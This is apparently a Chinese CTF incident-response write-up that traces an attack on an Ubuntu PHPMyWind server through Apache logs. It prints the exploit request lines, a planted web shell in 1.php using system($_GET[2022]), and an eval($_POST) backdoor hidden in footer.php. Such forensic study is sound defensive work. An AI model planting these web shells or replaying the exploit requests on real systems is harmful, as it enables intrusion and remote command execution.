信安大赛-应急响应

Ubuntu应急响应

1	提交攻击者的IP地址
2	识别攻击者使用的操作系统
3	找出攻击者资产收集所使用的平台
4	提交攻击者目录扫描所使用的工具名称
5	提交攻击者首次攻击成功的时间，格式：DD /MM/YY:HH:MM:SS
6	找到攻击者写入的恶意后门文件，提交文件名（完整路径）和后门密码
7	找到攻击者隐藏在正常web应用代码中的恶意代码，提交该文件名（完整路径）
8	识别系统中存在的恶意程序进程，提交进程名
9	找到文件系统中的恶意程序文件并提交文件名（完整路径）
10	简要描述该恶意文件的行为

root

1234546

1.提交攻击者的IP地址

一直找日志

是这个

more access.log.1

从192.168.1.5到192.168.1.7就不一样了猜测攻击者是192.168.1.7

192.168.1.5 - - [24/Apr/2022:15:11:48 +0000] "GET /data/captcha/ckstr.php HTTP/1.1" 200 1499 "http://192.168.1.3/message.php" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)"::1 - - [24/Apr/2022:15:11:55 +0000] "OPTIONS * HTTP/1.0" 200 126 "-" "Apache/2.4.41 (Ubuntu) (internal dummy connection)"
192.168.1.7 - - [24/Apr/2022:15:14:32 +0000] "GET / HTTP/1.1" 408 482 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0"
192.168.1.7 - - [24/Apr/2022:15:14:52 +0000] "GET /favicon.ico HTTP/1.1" 200 39411 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0"
192.168.1.7 - - [24/Apr/2022:15:15:20 +0000] "GET / HTTP/1.1" 200 3663 "https://www.shodan.io/search?query=php" "Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0"
192.168.1.7 - - [24/Apr/2022:15:15:20 +0000] "GET /templates/default/style/webstyle.css HTTP/1.1" 200 6599 "http://192.168.1.3/" "Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0"

192.168.1.7

2.识别攻击者使用的操作系统

192.168.1.7 - - [24/Apr/2022:15:15:20 +0000] "GET /templates/default/style/webstyle.css HTTP/1.1" 200 6599 "http://192.168.1.3/" "Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0"

Linux x86_64

3.找出攻击者资产收集所使用的平台

shodan.io

日志中找到

shodan.io

4.提交攻击者目录扫描所使用的工具名称

192.168.1.7 - - [24/Apr/2022:15:17:45 +0000] "GET /rHdA9nYoF68B HTTP/1.1" 404 43
4 "-" "DIRSEARCH"

DIRSEARCH

5.提交攻击者首次攻击成功的时间，格式：DD /MM/YY:HH:MM:SS

192.168.1.7 - - [24/Apr/2022:15:25:53 +0000] "GET /shoppingcart.php?a=addshopinggcart&goodsid=1&buynum=2&goodsattr=as%26time=999999999999999999%26uid=/../../../pproc/self/cwd/1.php%26a=1 HTTP/1.1" 200 425 "-" "python-requests/2.23.0"
192.168.1.7 - - [24/Apr/2022:15:25:53 +0000] "POST //data/avatar/upload.php?a=upploadavatar&input=2690b1IhecCIpeAK%2BnPLfbnP3AF%2F9TwHSnAxI%2BAfZ%2BC0xIaO33AMyGeeGhpEIO2WxXowgLJ%2FFbPKzhcd1x4Xlwdbs1Pjg5V6Yy2MSj1yzlbw6eHXc6Mu%2FZ5BSbVUolg2kh400WeVCGgHRYc4Zu8X4VONadz5WOuerWpdPmDRtAjQb8lZjMVQDSPgY&_SERVER%5BHTTP_USER_AGENT%55D%5B%5D=1 HTTP/1.1" 200 296 "-" "python-requests/2.23.0"

这两条日志

先是上传了一个php文件

然后命令执行了

24/Apr/2022:15:25:53

24/04/22:15:25:53

6.找到攻击者写入的恶意后门文件，提交文件名（完整路径）和后门密码

根据上题日志

上传了一个1.php

find / -name 1.php

root@webserver:/# cd /var/www/html/data/avatar
root@webserver:/var/www/html/data/avatar# ls
1.php  images  index.php  lib  upload.php
root@webserver:/var/www/html/data/avatar# cat 1.php
<?php system($_GET[2022]);?>#define width 20#define height 20

文件名：1.php

后门密码：2022

7.找到攻击者隐藏在正常web应用代码中的恶意代码，提交该文件名（完整路径）

root@webserver:/var/www/html# cat footer.php 
<!-- weblink--><div class="weblink"><?php$dosql->Execute("SELECT * FROM `#@__weblink` WHERE classid=1 AND checkinfo=true ORDER BY orderid,id DESC");while($row = $dosql->GetArray()){?><a href="<?php echo $row['linkurl']; ?>" target="_blank"><?php echo $row['webname']; ?></a><?php}?>
</div>
<!-- /weblink-->
<!-- footer-->
<div class="footer"><?php echo $cfg_copyright ?><br />网站采用 <a href="http://phpmywind.com" target="_blank">PHPMyWind</a> 核心</div>
<!-- /footer-->
<?php
@eval($_POST['catchmeifyoucan'])
echo GetQQ();//将流量统计代码放在页面最底部
$cfg_countcode;?>

一个后门

/var/www/html/footer.php